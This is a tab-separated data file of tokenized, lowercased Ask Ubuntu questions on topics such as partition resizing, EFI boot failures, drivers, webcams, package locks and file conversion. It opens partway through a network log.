eth0 ) stage 3 of 5 ( ip configure start ) scheduled . 21:17:01 networkmanager [ 932 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) complete . 21:17:01 networkmanager [ 932 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) started ... 21:17:01 networkmanager [ 932 ] : < info > ( eth0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] 21:17:01 networkmanager [ 932 ] : < info > activation ( eth0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) 21:17:01 networkmanager [ 932 ] : < info > dhclient started with pid 1997 21:17:01 networkmanager [ 932 ] : < info > activation ( eth0 ) beginning ip6 addrconf . 21:17:01 networkmanager [ 932 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) complete . 21:17:01 dhclient : internet systems consortium dhcp client 4.1-esv-r4 21:17:01 dhclient : copyright 2004-2011 internet systems consortium . 21:17:01 networkmanager [ 932 ] : < info > ( eth0 ) : dhcpv4 state changed nbi - > preinit 21:17:01 dhclient : listening on lpf/eth0/94 : de:80 : a7 : c4 : ea 21:17:01 dhclient : sending on lpf/eth0/94 : de:80 : a7 : c4 : ea 21:17:01 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 3 21:17:02 avahi-daemon [ 922 ] : joining mdns multicast group on interface eth0.ipv6 with address fe80 : :96de:80ff : fea7 : c4ea . 21:17:02 avahi-daemon [ 922 ] : new relevant interface eth0.ipv6 for mdns . 21:17:02 avahi-daemon [ 922 ] : registering new address record for fe80 : :96de:80ff : fea7 : c4ea on eth0.* . 21:17:02 networkmanager [ 932 ] : < warn > error monitoring device for netlink events : error processing netlink message : object busy 21:17:04 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 7 21:17:11 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 15 21:17:13 networkmanager [ 932 ] : < warn > error monitoring device for netlink events : error processing netlink message : object busy
396805	i moved my /home partition and now some services do n't work	i am using backbox-ubuntu 12.04 lts my root partition got short on space so i decided to resize the home partition and add the free space to the root partition . i took backup of my /home partition and then deleted it . i then made a smaller /home partition and added the remaining unallocated space to the root partition . afterwards i recovered the /home data via acronis recovery . i 'm not a linux pro and i imagined all apps would run off the root partition , but now that i 've booted after the above resize , i sense some services not working . like the 'bumblebee ' giving the following error : ///////////////////////////////////////// [ 72.345198 ] [ error ] the bumblebee daemon has not been started yet or the socket path /var/run/bumblebee.socket was incorrect . [ 72.345238 ] [ error ] could not connect to bumblebee daemon - is it running ? ///////////////////////////////////////// i tried purging the ppa and reinstalling linux headers , without any luck . i also notice that i no longer see nvidia-settings in the startup menu . yet to see more issues but my question is , could moving/resizing /home partition stop some core services from running ? if so , how can i fix that ? ps : i also did the fstab method , which was already pointing to the correct uuid .
396813	checking media = failed / default boot machine not found / and i do n't know how to change the order in bios	i installed ubuntu 12.04 lts 64bit to my lenovo ideapad 210s touch and removed windows entirely . i used usb-stick for installation . now when i start the laptop it gives this text : checking media = failed in the top left-corner and after that comes text : default boot machine not found ... ... and i have to press return to enter bios and choose ubuntu which is not on the top of list . there is something that says efi etc . on top . i do n't know how to change the order that it would automatically choose ubuntu . everything works fine after that but it is annoying . when i try to press f2 before that checking media text , wo n't happen anything and i ca n't enter bios after that error message . what should i do ? i already did the installation again but error keeps coming . please help .
396814	crashing of certain programs after continuing from suspend - noveau drivers	i have noticed certain programs wo n't work after i continue from suspend . most things work ok , but for instance when i run amarok and switch to `` context '' tab ( the one with graphic display of played frequencies ) it freezes and i have to manually kill it and then reboot in order to start it working properly again . there are a few other programs with similar problems e.g . they work until engaging some serious xorg or noveau-drivers task . sometimes even if i do n't use the suspend mode but use heavily chrome browser things really slow down and though working i ca n't properly log out or reboot but have to use hardware switch -- or wait forever looking at a black screen ( after i get notification about xorg and noveau failing to initiate ) ? ? i am using fully updated 12.04 lts and open source drivers . also it does n't crash when using 3.5 kernel but it does when using 3.11 so it might be the problem lies therein..
396818	facebook addresses in gnome contacts	i am using contacts 3.8.3 in gnome 3.8.4 on ubuntugnome 13.10 . in gnome online accounts , i have set up a google account and switched contacts on . so , my contacts application now shows gmail contacts . i have also set-up a facebook account . but it does not have integration with contacts . am i missing some packages , etc . or the true integration of several online services still a remote dream ?
396821	encrypted home folder and programs working while screen is locked ?	is the home folder encrypted while the screen is locked and what happens with programs running in the background that need to access it if it is ?
396825	convert docx to pdf	i am trying to convert docx files to pdf on my ubuntu server using the command line but none of converters i tried so far seems to convert word 2007/2010/2013 files correctly . appearently online converters can manage it without any problems but web services are not an option because the files contain sensitive data . for tests i use this word 2007 file because it contains some important elements ( formulas , vector graphics , images , lists , etc. ) . i tested the following tools ( partly from this post ) : lowriter ( libreoffice writer ) - incorrect output ( the circle is supposed to be on the last page , not the first one ) unoconv - the same as libreoffice since it does n't use its own converter . converting to odt first and then to pdf messes the file completely up . abiword -- to=pdf filename.doc - incorrect and incomplete ( many elements are missing ) : openoffice writer - same result as for abiword wvpdf - crash with the following error message : ~ $ wvpdf 2007_office_docencryption.docx test.pdf current directory : /home/webmt/dev/test/ some problem running latex . check for errors in test.log continuing ... conversion into dvi failed is there any way to convert docx files to pdf on linux correctly ? it would also help me if i knew it works for someone with any of the programs i already mentioned . i will start a bounty as soon as se lets me . p.s . i 'm using ubuntu server 12.04 conclusion : i had to conclude that as for me , as for now , there is no reliable tool which will work with new ms word formats and all kind of its elements on ubuntu and create a one-to-one copy of docx files . none of tools i tested could convert the sample file properly . since i will be facing very different kind of document versions/contents and the output quality has one of the highest priority , i will end up performing the conversions by means of vb macros in word on a windows server connected to my linux . i will set the post getting the best results as the accepted answer . however , the bounty was intended for a solution with absolutely correct conversion . thanks to everyone , again .
396826	efi boot messed up after lubuntu install [ eee 1215b ]	i have been trying to understand the differences between efi ( uefi ? ) partition systems and the old bios systems for the last week , but i do n't seem to get anywhere . problem : getting my computer to boot normally . i would be happy to do a complete reinstall , but i need to understand what has to be done to get this efi-stuff to work , and none of the guides i 've found bring any luck . background info : - boot-repair boot-info summary : http : //paste.ubuntu.com/6651440/ prehistory : i had only win7 installed . i installed kubuntu next to win7 without any particular problems , but found that kde was a bit heavy on my machinery and decided to try lubuntu . installing lububuntu , i was asked whether i wanted to overwrite the previous kubuntu installation , i ( in a moment of low comprehension ) accepted that , not understanding that this would probably also wipe my win7 partition , the recovery partiotion and all else - which is what i assumed happened . then suddenly , the installation program produced an error message stating that there was an unencrypted swap drive active , and aborted . and after this , i have been struggling for days to be able to boot my computer without my liveusb ( the booting of which also proved quite frustrating after this . i have tried loads of solutions found on ubuntuforums and askubuntu , trying to install lubuntu in efi-mode ( the existence of which i was not aware before i started this ) . this is where i stand now : using the lubuntu installation programme , i have installed lubuntu ( no dual boot ) with a 500 mb efi ( fat32 ) partition ( sda1 ) , a 460 gb lubuntu partition ( sda2 ) and a 5 gb swap partition ( sda3 ) . the system , however , would not boot on anything but the liveusb , so i tried boot-repair from the liveusb , which clearly identified the efi system at startup , hoping it would simply reinstall grub2 and all would be fine . no luck , however . for some reason , when i start up my computer , all i get is a request to `` reboot or select proper boot device '' . what i did after this ( and i 'm sorry that i have lost track of which forum posts i got my tentative fixes from , so i ca n't refer ) was to format sda1 ( the efi partition ) to `` cleared '' , using gparted , and providing it with the flag `` bios_grub '' . then i ran boot-repair again , ignored what warnings popped up and let boot-repair reinstall grub again . i rebooted and got the same old request to `` reboot or select proper boot device '' . however , when i push esc on startup and actively choose to boot from the hard drive , this works . so now i can cumbersomly boot my computer through what i have understood is commonly referred to as `` legacy '' in these forums , although it seems my computer expects efi boot ( i might be completely off here , i really do n't understand what i 'm doing here ) . this is definitely sub-optimal , so i wanted to try installing the system again , with a functional grub . assuming that maybe the lubuntu installation messed up , i therefore tried making a ubuntu liveusb . i booted the computer , and - pushing esc , getting up the bios boot menu - i tried both the `` normal '' and the efi-option for booting the usb , but none of them worked . in the situation i 'm in , i can easily wipe anything of my hard drive , i just want to be able to install a functioning boot system , and i do n't understand what i am doing wrong , since what i have found of guides to install efi systems seem so simple . all i 'm supposed to need is this efi partition , but my computer does n't seem to recognise it . ps : boot-repair says `` please do not forget to make your bios boot on sda1/efi/ubuntu/grubx64.efi file ! '' how do i do that ? is this what i 've done wrong ? also , for reference , here is a ( `` solved '' ) thread i posted on ubuntuforums for my first problem of the dual boot that got messed up . i do n't think any of this is relevant here , however : http : //ubuntuforums.org/showthread.php ? t=2195105 i am very grateful for any help you can provide ! i 'm at a loss and a bit demoralised by being forced to learn about ( u ) efi during the last days , not understanding what to do.. there is probably to much information here already , but if anything else should be here for you to understand the problem , i 'm happy to provide !
396827	how can multiple people concurrently use a single machine with a keyboard and monitor each ?	is there a multi-user system in which several users can log in simultaneously ? it should support several end-users with only one keyboard , mouse and monitor each . these users should be able to run programs simultaneously , as if they were on separate machines , but in reality they should be running the same machine . basically , i need a cost effective solution for computers in a 3rd world country where we could get a single computer behave like multiple computers using monitor and keyboard . i would also like to have basic idea of its cost .
396828	how to install 3ds max ( version 2014 ) on ubuntu 13.04	hell guys . i want to install 3ds max on my ubuntu ( 13.04 ) . i have to install it on wine but i dont know what packages have to install for install it . can anybody help me ?
396832	swapon : /dev/sdb1 : swapon failed : invalid argument	i am unable to mount a swap partition terminal code : device boot start end blocks id system /dev/sdb1 2048 7831551 3914752 82 linux swap / solaris root @ chrubuntu : /home/user # swapon -v /dev/sdb1 swapon on /dev/sdb1 swapon : /dev/sdb1 : found swap signature : version 1 , page-size 4 , same byte order swapon : /dev/sdb1 : pagesize=4096 , swapsize=4008706048 , devsize=4008706048 swapon : /dev/sdb1 : swapon failed : invalid argument root @ chrubuntu : /home/user # can someone help ? edit : output of sudo blkid /dev/sda1 : uuid= '' 63dbf7c2-877c-4a5e-8281-8be811c60056 '' type= '' ext4 '' /dev/sda3 : label= '' root-a '' sec_type= '' ext2 '' type= '' ext4 '' /dev/sda5 : uuid= '' 2678643c-7148-427e-99b9-3af143dedcf3 '' type= '' ext4 '' /dev/sda7 : uuid= '' 38794eb2-bdc4-4f2a-97fd-0100fa5600a0 '' type= '' ext4 '' /dev/sda8 : label= '' oem '' uuid= '' e39a733b-31fd-48df-8645-0e64e14d3f10 '' type= '' ext4 '' /dev/sda12 : sec_type= '' msdos '' uuid= '' 7b3e-eae9 '' type= '' vfat '' /dev/sdb1 : uuid= '' a4637af0-b82f-4247-ace4-c1621d2fdb7a '' type= '' swap ''
396833	how to identify whether flash player has been installed or not ?	i totally switched to ubuntu ( 13.10-saucy , 32-bit ) recently leaving windows behind forever . my problem : when i visited youtube ( through firefox ) , the video was not able to play and told me to install flash player . i downloaded the flash-player ( install_flash_player_11_linux.i386.tar.gz ) and followed steps shown in `` readme.txt '' of flash_player : unpack the tar.gz file . once unpacked you will see the following : + libflashplayer.so + /usr o identify the location of the browser plugins directory , based on your linux distribution and firefox version o copy libflashplayer.so to the appropriate browser plugins directory . at the prompt type : + cp libflashlayer.so < browserpluginslocation > ( ***i used /usr/lib/firefox/plugin-container*** ) o copy the flash player local settings configurations files to the /usr directory . at the prompt type : + sudo cp -r usr/* /usr after these steps , i rebooted and visited youtube again but still am not able to watch videos . it shows the same error and asks to `` install flash '' . please help . any help will be appreciated . ( this is my first question based on ubuntu , so apologies if i have missed something or if anything is not proper. )
396836	is there a way to play bejeweled blitz on facebook with ubuntu ?	is there a way to play bejeweled blitz on facebook with ubuntu ? i am not really used to the os and am not sure if there is something i am missing or not .
396837	detecting the name of a network device in bash ?	i 'm trying to drum up a hack that will output the name of active network devices on one 's computer via bash . i 'm making it for work . how do i go about doing this ? i do n't want to just plainly use `` wlan0 '' or `` eth0 '' or any of that generic crap because some oses use different names ( like pfsense for example ) .
396838	work time tracking app ?	i 'm looking for time tracking app for linux that works automatically . which means that you do n't have to enter each new activity when you start it ( as in hamster ) . best would be if it logs the app title and for how long it has been used . if it can track on which workspace you are too , even better . ( unfortuantely that function of hamster doesnt work with compiz , otherwise it would have been great ) it should n't send the data to a server so recuetime and timedoctor are no good either . arrbtr seems to be all that , but it 's too early version and shows stats just in the terminal now . so is there anything else that i 'm missing ?
396839	usb device not discovered after system restart	i have an usb device that after pluging in is visible as /dev/ttyacm0 . unfortunately , after system restart , it is not beeing discovered and i have to plug it out and in again to work . i have found a piece of code : http : //www.clearchain.com/blog/posts/resetting-the-usb-bus-under-linux but it 's result is similar to the system restart . if device is present and working , program sees it , claims that it is beeing reset and then device dissapear from /dev . otherwise nothing is happenig . my question is : how to force the system to discover my device without pluging it of and on again ? i 'm using ubuntu server 12.04.2 lts . i will appreciate any tips .
396841	how can i save my bluetooth headset volume settings ?	i 'm running ubuntu 13.10 , but i first saw this on 13.04 . whenever my headset connects to my computer , the audio gets set for `` telephony duplex '' instead of `` high fidelity playback '' . additionally , the volume gets set to maximum , and the volume control on my screen continues to be for my laptop speaker volume instead of for the headset ( which is where the music is usually now going ) . this a mere annoyance if i 'm just getting set up , but if i walk out of range and then back into range i can get maximum volume pummeling into my ears . so , how do i make ubuntu remember the volume setting across connects and disconnects ? pacmd list ( no expiration ) default.pa ( no expiration )
396843	some doubts about dualboot and android	hi all ubuntu community ! i need to solve some doubts hehehe : ) are both about # dualboot and # android . i have a nx4 , and i have clockworkmod and i want to know if it is what cames for defeaut or may i have installed it time ago when rooting , if so , what does it have the official google image ? . the clokworkmod works with dualboot ? to have the bootloader unlocked means to be root ? if so , it would be only needed to have the supersus app for being root ? whats the correct way to root my nx4 in face of installing the dualboot ? when trying to make dualboot , the command ( dualboot.sh ) in the slideboard ( or somethig like that , indeed , whats that ? ) it seems that the terminal doesnt send nothing and says `` waiting the slide*** to boot '' and in my nx4 `` ready to recive ... '' thanks you very much for any help , and sorry for my english ^^
396846	why i saw the message do n't unplug until it finished	i copied a big file to my external hard disk , i saw this message after the progress bar disappeared . does it mean the copy progress is still going on ? if it is still going on why the progress bar stated finished and disappeared , bug ?
396847	how to remove `` standby inactivity message '' ubuntu 13.10	how to remove the popup message from standby inactivity ? because this message is more than annoying , it is still there when i wakes . using ubuntu 13.10 ( upgrade from 13.04 ) with unity translation : power automatic suspend computer will suspend very soon because inactivity edit [ 7-01-2013 ] : i believe we have found a solution on the ubuntu-fr.org forum . all credits to return bybeu who created a script that literally removes the popup message . when i speak , i have not tested the script but if an expert could there have a look and give us his opinion , it would be appreciated . you can find the info of bybeu here to post # 13 http : //forum.ubuntu-fr.org/viewtopic.php ? pid=15691731 # p15691731 or via google translator
396848	is the radeon hd 7790 supported in ubuntu ?	i have an msi radeon hd 7790 graphics card and i can not figure out whether it 's supported in ubuntu or not , and to what extent ( 2d , 3d accel. , vdpau , etc ) . i tried asking on a few forums but got mixed/ambiguous replies . does anyone here know ? where and how can i check ?
396853	problem while installing ubuntu alongside windows 7	i am trying to install ubuntu 12.04 from usb .everything is fine till i have to choose where to install it . it shows only the `` replace windows '' and `` something else '' . i was expecting to see `` install alongside windows '' as i read on the forum . i see some suggestions to check if there are not up to 4 partitions on disk . i am totally naive . below is the picture of my windows disk management . please can you tell if it has 4 partitions . i see 3 partitions for disk0 and 1 for disk1 . please help me find solution . i do n't mind deleting the recovery partition if it will solve this problem . thanks
396854	can i switch to wondows 8.1 ?	my computer is running the latest version of ubuntu . can i install windows 8 and clean off ubuntu ? i do n't want to duel boot .
396857	how can i add processing to the unity launcher ?	processing is an open-source language and environment for learning the fundamentals of electronic art and computer programming . its linux download package includes a file called processing that , when run , opens the main processing ide . how can i add this program to the unity launcher in ubuntu 13.10 ?
396863	skype webcam woes on ubuntu 12.04	so , my webcam does n't work on skype . at all . tried cheese , it works there . here 's what i did to try to fix the problem : root @ aesculapius : ~ # lsusb bus 002 device 002 : id 17f6:0216 unicomp , inc bus 003 device 002 : id 093a:2464 pixart imaging , inc . bus 005 device 002 : id 1532:0005 razer usa , ltd bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub the second line is my webcam . tried cheese , works fine . looked on net , apparently v4l1compat.so must be pre-loaded . i tried the two suggested paths : root @ aesculapius : ~ # ld_preload=/usr/lib32/libv4l/v4l1compat.so /usr/bin/skype error : ld.so : object '/usr/lib32/libv4l/v4l1compat.so ' from ld_preload can not be preloaded : ignored . root @ aesculapius : ~ # ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so /usr/bin/skype error : ld.so : object '/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so ' from ld_preload can not be preloaded : ignored . tried manually finding the file v4l1compat.so : root @ aesculapius : ~ # locate v4l1compat /usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so the file does not exist in the two paths above , and apparently the v4l1compat in x86_64 is incompatible , as proven by the following : root @ aesculapius : ~ # ld_preload=/usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so /usr/bin/skype error : ld.so : object '/usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so ' from ld_preload can not be preloaded : ignored . please help me solve this problem .
396866	problems in installing packages from terminal	whenever i try to install any missing packages from my terminal by using the command sudo apt-get install ( package name ) it shows the following error : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? also , if i try to open the synaptic package manager then it shows this error : unable to get exclusive lock this usually means that another package management application ( like apt-get or aptitude ) is already running . please close that application first .
396868	supported wireless adaptors	does anyone know if ubuntu 12.04 lts supports the following eidmax ew-7128g wireless pci card d-link dwl-g122 usb adaptor belkin 802.11g usb adaptor ( model f5d7050uk ) will they work out of the box or will i need drivers . if so where can i get the drivers .
396869	how delete files - based on date in filename	i have some folder with files with the names as `` example_yy_mm_dd-hh.zip '' and i have 3 backups per day . i need this : 1 ) for backups older than 1 week i need only one per day ( at midnight '00 ' at hh ) 2 ) for backups older than month i need only one backup per week . 3 ) for backups older than one year i need only one backup per month ( first day of month ) i have only this and i dont know what put to if part . thanks # ! /bin/sh export now= $ ( date + '' % d- % m- % y '' ) export output=/media/backup/logs/delete-old.txt export backup_dir= for file in $ backup_dir do if $ file fi done
396873	mac g5 issues with 12.04 booting	i retrieved a mac g5 from a friend , he had no information about it his company was throwing them away so i picked one up . when i powered it looked liked a 12.04 cd was in the tray or the it was installed with ubuntu . without pressing c on the keyboard it has the typical ubuntu loading screen , loads everything then the screen goes blank . i powered off and powered it again and this like i pressed c to boot from the the tray , i had the loading kernel progress , a few minutes passed and nothing went to blank . i have been using ubuntu for about a year now and have installed in plenty of times but never went through an issue like this . is it possible the person before me had no idea what they were doing and screwed something up ? or they were using the incorrect iso for the mac ? possible hardware issue ? i want to put on either arch linux or a ubuntu on this machine , but have no idea how to open the tray from the loading screen , i know for mac you press the eject button , but i am using a regular keyboard . so to had on to my other questions how do i release the tray ? there definitely is n't a mac os on this machine , i am almost certain it is ubuntu .
396874	touchegg settings unchangeable	i 've installed ubuntu 13.10 on my asus zenbook ( ux31e ) , and i like it very much ! i tried to find a solution for my multi-touch touchpad , and found touchegg . installed it via the software center , and i 've put it in the start-up programs . all the gestures worked immediately after i rebooted , pretty cool . only problem is , whenever i change settings in the touchegg.conf file it gets saved in the config file , but touchegg does n't seem to copy those settings , and only stays with the defaults even after reboot etc ... am i missing something here ? regards , marty
396878	help with modem and question about driver update	i do not understand how to do this : how to make huawei e3276 to work i would really like some help cause apart from a crummy cellphone tethering the mobile broadband is my only way to connect to the internet . how do i update the cdc_ncm.ko driver ? echo `` 12d1 1506 '' > /sys/bus/usb-serial/drivers/option1/new_id i do this , but even with root access noting happens . the command that i should use to connect does n't do anything at all .
396880	ubuntu touch for nokia devices	can you guys find a way to install ubuntu on nokia lumia 720.please.i really want to try your os .
396882	how to disable usb wifi adapter when i put computer to sleep ?	i installed an external micro usb wifi adapter because the internal wifi on my laptop was struggling with ubuntu . it works great , but unfortunately it continues to run when i put the computer to sleep which runs the battery down . how can i disable it during sleep and have it wake up when the computer does ? thanks ! !
396883	how to simply convert video files ( i.e . : mkv to mp4 ) ?	i simply want to convert files , any format to any format ( at the moment , i need to convert mkv to mp4-h264 ) , without losing quality . i do n't want to resize ( scale ) the video , i do n't want to change its aspect ratio and i do n't want it to lose quality ( this is very important ) ; all i want is `` to change the format '' , that 's all . reason : my dvd player wo n't recognize any formats other than avi or mp4 . i do n't care about file size , unless the difference between the input and the output files is absurdly huge . so , how do i do that ? i 've already tried programs such as winff , arista , format junkie , but their presets always change something which i do n't want to be changed ( size , aspec ratio , etc. ) . i 'm not really sure , but i think the best way to get what i want is to go with the pure ffmpeg commands . but how ? by the way , ubuntu 13.04 ( 64-bit ) , here . thanks for your time , guys .
396884	black screen on boot ( no backlight )	so after grub .screen my computer screen turns black . i can fix it by increasing brightness with f3-key but is there any way to make it boot with full backlight ? my kernel parameters are : quiet splash acpi_osi=linux hardware info : model : hp pavilion laptop cpu : intel i5 gpu : intel 4600
396886	various programs failing to launch after clean installation	i 've just installed a fresh copy of 12.04 and all updates . a couple programs which i downloaded , such as mikogo , simply wo n't start . there 's no error message even when i try to run these programs from the terminal - just a silent failure with nothing happening . all other programs seems to work fine . what could be causing this and how can i get them to start properly ?
396887	execute a command after pressing media key in ubuntu 13.10	i 'm using ubuntu 13.10 and i 'm looking for a way to execute a command after i press a media key on my keyboard , like x86audioplay . i need the solution to work globally , not just in a single application . i ca n't find where this can be configured . all the solutions i found are using gconf-editor and apps/metacity or apps/gnome_settings_daemon/keybindings , but i ca n't find this setting . from what i understand , it 's probably because media key support was moved from gnome to unity . how to do it ?
396889	how to get internet to wlan0 from eth0 ?	i have hostapd and dnsmasq installed for distributing wlan with a wifi-dongle and everything is working well . i am also able to connect an ethernet-cable and get dhcp+internet from a router . is there a way to bridge the internet connection from eth0 to my dhch wlan0 ? so it becomes possible to connect with wifi and surf the net , like a router . i am running ubuntu on a beaglebone black .
396892	installing starcraft via cd	i have the starcraft cd . and when i load it , it works fine , until i login . then it just crashes . aside from lowering the graphics or resolution . i knew someone who said there was something you do before hand and it should eliminate the problem . does anyone know a successful way to run starcraft on linux ( ubuntu ) without it crashing after login ? i 'm not in touch with that person , so aside from graphic changes , not sure what he did because i remember he was able to find a way .
396897	logitech c920 on ubuntu 12.04 lts . where to begin ? does it work ? anyone using it on hangouts ?	i just got the logitech c920 webcam for christmas . i 'm a little disappointed to read the different forum posts regarding the c920 and ubuntu pairing . ideally , i 'd like to use this webcam on google hangouts , and i 'd like to take advantage of the full 1080p hd capabilities . however , i 'm seeing that hangouts is coded differently than skype , and the webcam was spec 'd with skype in mind . right now i 'm looking at perhaps installing guvcview someone told me that using this in hangouts will spike your cpu because `` google decided it was a good idea to abandon h.264 in favor of vp8/9 for video and audio encoding '' , and in order to get hd , you need 4gb ram . i 'm just looking for where to start ? have n't even opened the camera box yet , because i want to make sure this will work , or i 'm returning it . edit : after running command below for installing guvc this is the response i got : reading package lists ... done building dependency tree reading state information ... done note , selecting 'libpt-1.10.10-plugins-v4l2 ' for regex 'libpt-1.10.10-plugins-v4l' e : unable to locate package v4l2loopback-utils e : unable to locate package gem-plugin-v4l2 e : unable to locate package libpt-1.11.2-plugins-v4l2 e : could n't find any package by regex 'libpt-1.11.2-plugins-v4l2' e : unable to locate package v4l2loopback-utils e : unable to locate package gambas2-gb-v4l e : unable to locate package gambas3-gb-v4l e : unable to locate package gem-plugin-dv4l e : unable to locate package gem-plugin-v4l2 e : unable to locate package libpt-1.11.2-plugins-v4l e : could n't find any package by regex 'libpt-1.11.2-plugins-v4l' e : unable to locate package libpt-1.11.2-plugins-v4l2 e : could n't find any package by regex 'libpt-1.11.2-plugins-v4l2' e : unable to locate package libv4l-ruby1.8 e : could n't find any package by regex 'libv4l-ruby1.8' i 'm running windows 7 and ubuntu 12.04 lts on toshiba satellitel755 memory : 3.8 gib processor : intel® core™ i5-2410m cpu @ 2.30ghz × 4 graphics : intel® sandybridge mobile os-type 64bit disk : 40.2 gb
396900	rhythmbox shows wrong album picture	when i play a music and rhythmbox goes to the next track , it shows an album picture which is a really nice feature . the problem starts when music player goes to the next track and picture album is from a random track . this process goes on for good ! example : when i click the first track and then on 4th track picture album gets selected quite random . in the following picture pop up box for the new music is fake ! why is this happening ? is there any solution for it ?
396901	ubuntu 13.10 boot failure : black and purple flashing screen	i see you deleted my post complaining about the widespread failure of ubuntu 12+ to boot on pretty much 'industry standard ' systems . the point i want to make is that as a long time ubuntu fan i 'm very disappointed that this issue is simply not being taken seriously enough . it 's very widespread and happening on a number of platforms as you can see from even a few cursory searches using ( for eg ) 'black and purple flashing screen when booting ubuntu from dvd ' . well we accept this is a freebie system but does that mean we have to diplomatically 'tiptoe ' around core issues - eg boot failure ? well i 'm sorry - if you are going to play it that way i 'll just have to agree with what was said in a recent linux magazine issue - ie that canonical are just going their own way without paying any attention to their user base . criticism such as my post is ultimately meant to be constructive - it says 'wake up and resolve ' so that long time ubuntu users such as myself can continue to be fans of this os . how can that be if we are having to spend hours and hours trolling the internet for solutions that so far have failed to solve the problem ( for me anyway ) . and it 's very clear i am by no means unique in that respect .
396902	nvidia driver trouble	i recently installed ubuntu and i am fairly new to it . i have a geforce gtx 550 ti and i want to install my graphic drivers on it . so i disable stop lightdm sudo service lightdm stop . i then go to where my driver is . and type ./nvidia-linux-x86_61-331.20.run it then gives me the error : error : the noveau kernel driver is currently in use by your system . this driver is incompatible with the nvidia driver , and must be disabled before proceeding i really have no idea how to approach this .
396907	not able to install eclipse ide on 13.10 version	i am trying to install eclipse ide eclipse-rcp-kepler-sr1-linux-gtk-x86_64.tar.gz and has followed all the steps as mentioned here : '' how to install eclipse ? '' but still not able to launch eclipse . error : can not execute binary file i have already installed jdk 1.7. uname -i i686
396911	conky disappear after moving at desktop - lubuntu 13.10	i configured conky accord to this tutorial configure conky-lua in ubuntu . i set it starts at the boot . but it always disappears after i click mouse at desktop . i tried all variants as : own_window_type desktop i could n't find solution how to make it stable ? how to solve this trouble ?
396912	virtualenv permission denied	after a lot of struggle with virtualenv/virtualenvwrapper i decided to remove all virtualenvs and re-install the packages . root > su myuser myuser > sudo pip install virtualenv myuser > sudo pip install virtualenvwrapper i proceeded to add this to my unix users .bashrc file . export workon_home= $ home/.virtualenvs export virtualenvwrapper_python=/usr/bin/python2.7 source /usr/local/bin/virtualenvwrapper.sh when i source .bashrc i get about 20 error lines ending with ioerror : [ errno 13 ] permission denied : '/root/.virtualenvs/premkproject ' . i 'm running out of ideas ... i have done my homework and tried every suggested solution i could find . i 'm running ubuntu 12.04 .
396913	is there any app like dreamweaver in ubuntu ?	im new to ubuntu and i need to know if there is any program like dreamweaver in ubuntu . i 'm interested in web designing and developing php .
396914	appending apt-get source code to remove broken packages error	can anyone help me append the source code of apt-get in such a way that the system never gives the unmet dependencies : broken packages error ... i have been looking into the source code of apt-apt-0.8.16~exp12ubuntu10.10 and figured out that there are certain funtions in algorithms.cc that do handle broken packages ... but the system still gets such errors . i wish to stabilize apt in such a way that such error is sorted out by itself before ever showing up .
396917	fatal : module rtc not found	upstart gives `` unknown job '' error when i try to start the server with $ start < my-app-name > . i found this in the logs : z @ ubuntu : /var/log/upstart $ sudo zcat module-init-tools.log.1.gz fatal : module rtc not found . can you help me understand how i can fix this ? from my search online it seems this is related to a missing module in the kernel ? ?
396918	routing host traffic through kvm guest	i 'm trying to get my host to route its traffic through a kvm guest ( untangle ) , but i 'm not having any luck with basic ip table rules . right now , i have all traffic being received by the host on eth2 and forwarding all traffic to eth1 . eth1 is bridged to br1 , which untangle sees as a wan . untangle bridges to br0 . that 's all working fine . any new guest that i create will route through untangle , and my router plugged into eth0 is routing through untangle . how do i get the host to route through br0/eth0 ? here 's my current routes output with traffic going through eth2 on host : kernel ip routing table destination gateway genmask flags metric ref use iface default 76.xx.xx.x 0.0.0.0 ug 0 0 0 eth2 10.10.10.0 * 255.255.255.0 u 0 0 0 br1 76.xxx.xx.x * 255.255.248.0 u 0 0 0 eth2 link-local * 255.255.0.0 u 1000 0 0 br0 192.168.2.0 * 255.255.255.0 u 0 0 0 br0 192.168.122.0 * 255.255.255.0 u 0 0 0 virbr0
396920	downloading files with w3m	i 'm trying to acess my emails attachements using ěw3m . when doing so , i managed to see the attachement content . however , i have no clue on how to have this file downloaded on my computer , wich is my main purpose . any ideas how to proceed ?
396921	problems after sudo apt-get remove wine*	i could n't get netflix desktop to launch , so i though about reinstalling wine ( since there had been a hiccup in the installation of netflix desktop and reinstalling it would n't make it launch ) and ran : sudo apt-get remove wine* which began uninstalling every program on ubuntu ( auch ) . i pressed ctrl+c when i realized that and then ran sudo apt-get install -- reinstall ubuntu-desktop sudo reboot as was indicated here what i 'd like to know is if -- reinstall ubuntu-desktop left everything as it was before ( minus the extra programs i 'll have to reinstall ) or if i now have a messy os , and how to fix it if so . needless to say , i 'm very new on linux but eager to learn nevertheless .
396923	`` try ubuntu '' - problems loading	i have a toshiba satellite laptop with windows xp and i want to `` try ubuntu '' before installing . getting a error during installation `` can not download the metalink and therefore the iso '' message . the steps i have taken are as follows : downloaded 12.04.1 to my hd used the universal usb installer clicked on install ubuntu ( e : ) clicked on wubi and changed the installation drive to e : ( 6gb free ) , desktop environment : ubuntu , then entered pw . other pertinent information that could helpful to you is that when i installed windows xp on my laptop 1 yr ago , i installed it with no partitions . any help would be very grateful ... thanks !
